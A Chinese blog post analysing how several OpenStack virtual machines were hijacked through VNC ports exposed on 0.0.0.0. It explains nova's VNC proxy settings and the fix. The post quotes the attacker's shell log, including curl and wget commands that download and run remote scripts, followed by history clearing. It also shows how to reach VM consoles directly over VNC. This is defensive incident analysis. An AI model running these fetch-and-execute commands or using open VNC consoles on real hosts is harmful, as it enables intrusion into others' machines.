一:问题定位

现象:

  近期发现有几台openstack云主机被修改密码并被肉鸡。

黑客操作日志:

-- :: ##### root tty1 :  #### -- :: top

-- :: ##### root tty1 :  #### -- :: clear

-- :: ##### root tty1 :  #### -- :: nvidia-smi

-- :: ##### root tty1 :  #### -- :: cd /opt

-- :: ##### root tty1 :  #### -- :: ls

-- :: ##### root tty1 :  #### -- :: ls -a

-- :: ##### root tty1 :  #### -- :: curl 666y.atwebpages.com/yamit.txt -o yamit && chmod +x yamit &&./yamit

-- :: ##### root tty1 :  #### -- :: ls

-- :: ##### root tty1 :  #### -- :: cat yamit

-- :: ##### root tty1 :  #### -- :: histoy -c

-- :: ##### root tty1 :  ####

-- :: ##### root tty1 :  #### -- :: rm -rf yamit

-- :: ##### root tty1 :  #### -- :: top

-- :: ##### root tty1 :  #### -- :: ear

-- :: ##### root tty1 :  ####

-- :: ##### root tty1 :  #### -- :: exit

-- :: ##### root tty1 :  #### -- :: clear

-- :: ##### root tty1 :  #### -- :: exit

-- :: ##### root tty1 :  #### -- :: ifconfig

-- :: ##### root tty1 :  #### -- :: ping ya.ru

-- :: ##### root tty1 :  #### -- :: wget https://pastebin.com/raw/BZk9zRE2

-- :: ##### root tty1 :  #### -- :: bash B

-- :: ##### root tty1 :  #### -- :: bash BZk9zRE2

-- :: ##### root tty1 :  #### -- :: rm BZk9zRE2

-- :: ##### root tty1 :  #### -- :: history =c

登陆方式不是通过暴力破解的方式进行登陆此机器,同时看日志看到登陆前有重启虚拟机的行为。

根据重启日志,应该是黑客通过某种方式重启 OpenStack 中的虚拟机,目前有以下几种方式

  1.有权限登陆 OpenStack 物理机,在物理机上操作虚拟机[排除--根据操作日志]

  2.有权限登陆 OpenStack dashboard,然后界面上 VNC 操作虚拟机[排除--根据 web 界面重启日志]

  3.使用 VNC 客户端直接操作 OpenStack 中的虚拟机

根据以上方法,确认是以 VNC 客户端直接操作 OpenStack 中的虚拟机导致。

二:处理方法

2.1VNC

VNC (Virtual Network Computer) 是虚拟网络计算机的缩写

2 .2用 VNC 客户端查看 openstack 创建的虚拟机

  在云计算的环境中,实际上更多的时候是使用 VNC 工具去查看云系统中的 VM。以下记录如何查看的方法:

  计算节点查看虚拟机的 ID(libvird 的,非 instanc_id)

[root@compute1 ~]# virsh list --all

Id Name State

----------------------------------------------------

 instance-000000b7 running

 instance-000000d3 running

 instance-000000de running#############比如这台

- instance-000000ac shut off

- instance-000000b2 shut off

- instance-000000b3 shut off

- instance-000000bb shut off

找到需要连接的虚拟机的 ID 号,查看其中暴露的端口:

[root@compute1 ~]# virsh vncdisplay

:

  然后在 VNC 查看工具中输入相关连接:

  在 VNC 客户端上输入 对应的计算节点 IP:1

  点击 Connect 后就可以连接上 openstack 创建的虚拟机。

【备注】以上采用的方法,实际是直接连接的底层的 libvirt,本质上和上层的 openstack 无太大关系,因此也可以用于其它平台。

2.3 查看外网可以连接的实例

root 权限登陆计算节点后

#netstat -tanp | grep kvm | grep LISTEN

输出的内容中,监听地址为0.0.0.0的,都可以外网直接访问此实例

3 OpenStack 中 VNC 分析

3.1 VNC Proxy 的功能

  将公网 (public network) 和私网 (private network) 隔离

  • VNC client 运行在公网上,VNCServer 运行在私网上,VNC Proxy 作为中间的桥梁将二者连接起来
  • VNC Proxy 通过 token 对 VNC Client 进行验证
  • VNC Proxy 不仅仅使得私网的访问更加安全,而且将具体的 VNC Server 的实现分离,可以支持不同 Hypervisor 的 VNC Server 但不影响用户体验

3.2 VNC Proxy 的运行过程

  • (01) 一个用户试图从浏览器里面打开连接到虚拟机的 VNC Client
  • (02) 浏览器向 nova-api 发送请求,要求返回访问 vnc 的 url
  • (03) nova-api 调用 nova-compute 的 get vnc console 方法,要求返回连接 VNC 的信息
  • (04) nova-compute 调用 libvirt 的 get vnc console 函数
  • (05) libvirt 会通过解析虚拟机运行的 /etc/libvirt/qemu/instance-0000000c.xml 文件来获得 VNC Server 的信息
  • (06) libvirt 将 host, port 等信息以 json 格式返回给 nova-compute
  • (07) nova-compute 会随机生成一个 UUID 作为 Token
  • (08) nova-compute 将 libvirt 返回的信息以及配置文件中的信息综合成 connect_info 返回给 nova-api
  • (09) nova-api 会调用 nova-consoleauth 的 authorize_console 函数
  • (10) nova-consoleauth 会将 instance –> token, token –> connect_info 的信息 cache 起来
  • (11) nova-api 将 connect_info 中的 access url 信息返回给浏览器:http://172.24.1.1:6080/vnc_auto.html?token=7efaee3f-eada-4731-a87c-e173cbd25e98&title=helloworld%289169fdb2-5b74-46b1-9803-60d2926bd97c%29
  • (12) 浏览器会试图打开这个链接
  • (13) 这个链接会将请求发送给 nova-novncproxy
  • (14) nova-novncproxy 调用 nova-consoleauth 的 check_token 函数
  • (15) nova-consoleauth 验证了这个 token,将这个 instance 对应的 connect_info 返回给 nova-novncproxy
  • (16) nova-novncproxy 通过 connect_info 中的 host, port 等信息,连接 compute 节点上的 VNC Server,从而开始了 proxy 的工作

3.3 NOVA 中 VNC 相关配置

  • vnc_enabled=True 启用虚拟机的 VNC 功能。
  • vncserver_listen=0.0.0.0
    • 127.0.0.1(默认),即只可以从本机进行访问,缺点是浏览器 VNC 访问实例也会失败
    • 管理网的 IP 地址
    • 0.0.0.0 主要是考虑到动态迁移时,目的宿主机没有相应的 IP 地址,动态迁移会失败。
  • vncserver_proxyclient_address 该地址指明 vnc proxy 应该通过那个 IP 地址来连接 vncserver,通常是管理网 IP 地址。
  • novncproxy_base_url=http://SERVICEHOST:6080/vncauto.html 指定浏览器 client 应该连接的地址。

  如果 OpenStack 平台架设在公网上,则 vncserver_listen 需要配置为管理网的 IP 地址,否则设置为 0.0.0.0 就会使得外网用户可以直接访问虚拟机,非常危险

3.4 重新设置监听地址后老实例的处理方法

  计算几点重新设置监听地址后(如从0.0.0.0,修改为计算节点管理网段的 IP),老的实例的对外的 VNC 仍然是 0.0.0.0

  那是因为 /etc/libvirt/qemu/instance-000000xx.xml 中配置的监听地址没有变化

  可以通过硬重启实例使之(老实例)生效

云计算---记一次黑客攻击openstack创建的虚拟机的更多相关文章

  1. VMware 接入 Openstack — 使用 Openstack 创建 vCenter 虚拟机

    目录 目录 软件环境 前言 Openstack 接口驱动 使用 KVM 在 Compute Node 上创建虚拟机的流程 使用 VCDirver 在 vCenter 上创建虚拟机的流程 配置 vCen ...

  2. openstack创建一个虚拟机的过程

      为什要用云? 一.简单的说就是对资源更加合理的分配,使用,比如硬件的数量,带宽等等这些,因为你不能机器买来不需要了再卖掉(当然也可以),带宽跟机房签合同得来一年的,中间不够了也不能加,超了也不退钱 ...

  3. Avast!:小型网站最易遭受的3种黑客攻击

    avast是捷克研发的杀毒软件,从网站上找到一篇avast关于网站安全的文章,觉得颇有意思,因此想到翻译过来与大家共享.有不对之处还望大家批评指正. 一个拥有上万访问者的小型网站管理员发来一份信,向我 ...

  4. CTF---安全杂项入门第三题 这是捕获的黑客攻击数据包,Administrator用户的密码在此次攻击中泄露了,你能找到吗?

    这是捕获的黑客攻击数据包,Administrator用户的密码在此次攻击中泄露了,你能找到吗?分值:30 来源: 2014sctf 难度:难 参与人数:3918人 Get Flag:384人 答题人数 ...

  5. Openstack创建镜像

    如何创建生产用的Openstack镜像 参考官方文档https://docs.openstack.org/image-guide/centos-image.html 1,创建虚拟机硬盘 qemu-im ...

  6. openstack 创建镜像生成虚拟机不知道密码如何解决

    背景: openstack juno版本,使用glance创建centos7镜像,然后生成虚拟机. 操作步骤: 首先获取镜像http://cloud.centos.org/centos/7/image ...

  7. 3种不走寻常路的黑客攻击泄露&如何保护自己?

    数据泄露和黑客攻击现在已经成为我们日常生活中的常见部分,除非您是网络安全专业人员或您的个人数据受到威胁,否则您实际上并不关心是否存在新的漏洞. 正如美国联邦贸易委员会指出的那样,万豪酒店连锁店的超过5 ...

  8. TLS漏洞:超过50万个电子邮件服务器容易受黑客攻击,太可怕了

    2019年在流行的开源Exim电子邮件服务器软件中发现了一个关键的远程执行代码漏洞,至少有超过50万个电子邮件服务器容易受到远程黑客攻击.Exim是一种广泛使用的开源邮件传输代理(MTA)软件,为类似 ...

  9. 伊朗Cisco路由器遭黑客攻击 全国互联网几乎瘫痪

    2018年4月9日,黑客攻击了伊朗的国家信息数据中心.伊朗internet信息安全部称,此次大规模袭击影响了全球约二十万个思科Cisco路由交换器,也包括伊朗的几千个路由器.攻击也影响了互联网服务供应 ...

随机推荐

  1. [LeetCode] 146. LRU Cache 近期最少使用缓存

    Design and implement a data structure for Least Recently Used (LRU) cache. It should support the fol ...

  2. [LeetCode] 875. Koko Eating Bananas 可可吃香蕉

    Koko loves to eat bananas.  There are N piles of bananas, the i-th pile has piles[i] bananas.  The g ...

  3. docker笔记2--镜像容器基本使用

    1 docker的安装 系统:centos7 (1)配置好yum (2)yum -y install docker (3)查看状态 systemctl status docker 2 docker镜像 ...

  4. 如何配置STP

    一.搭建本次实验的拓扑结构 两台s5700交换机模拟核心交换,两台s3700交换机模拟接入交换机,核心上配置eth-trunk   二.开启所有交换机的stp功能 开启stp [S1]stp enab ...

  5. SpringBoot配置文件敏感信息加密-jasypt

    使用过SpringBoot配置文件的朋友都知道,资源文件中的内容通常情况下是明文显示,安全性就比较低一些.打开application.properties或application.yml,比如mysq ...

  6. Spring Boot 项目中的 parent

    前言 我们成功创建Spring Boot之后,pom.xml坐标文件中都会有如下一段引用: <parent> <groupId>org.springframework.boot ...

  7. Word 自带公式编写多行公式时在任意位置对齐 -- 含视频教程(10)

    1. 方法1:表格法之利用"点"运算符对齐(简单) 以下百度经验是我自己写的,不想放在上边了,移到这里. 2. 方法2:表格法之制表位对齐法(复杂) 未完 ...... 点击访问原 ...

  8. python学习-61 类

    类 (在python2里) 1.属性 ---数据属性 ---函数属性 查看属性字典 class chinese: rz:'huangzhong' print(chinese.__dict__) 运行结 ...

  9. Python-09-文件处理

    一.文件操作流程 打开文件,得到文件句柄并赋值给一个变量 通过句柄对文件进行操作 关闭文件 #1. 打开文件,得到文件句柄并赋值给一个变量 f=open('a.txt','r',encoding='u ...

  10. [洛谷P5377][THUPC2019]鸽鸽的分割

    题目大意:有一个圆,圆上有$n$个点,将这几个点两两连接,问最多分成几部分 题解:发现这相当于一个平面图,由欧拉公式得($F$为平面分割块数,$E$为平面图边数,$V$为平面图点数):$$F=E-V+ ...